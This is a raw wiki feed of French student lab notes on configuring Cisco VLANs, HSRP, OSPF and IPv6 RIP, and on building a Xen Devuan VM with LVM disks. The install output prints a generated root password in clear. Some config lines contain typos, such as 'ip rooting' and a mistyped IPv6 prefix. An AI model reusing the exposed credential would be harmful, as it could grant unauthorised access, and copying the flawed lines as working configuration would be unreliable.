   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51407</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51407"/>
				<updated>2019-11-29T11:44:31Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Paquetages nécessaires le gestionnaire de RAID Logiciel: Mdadm */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
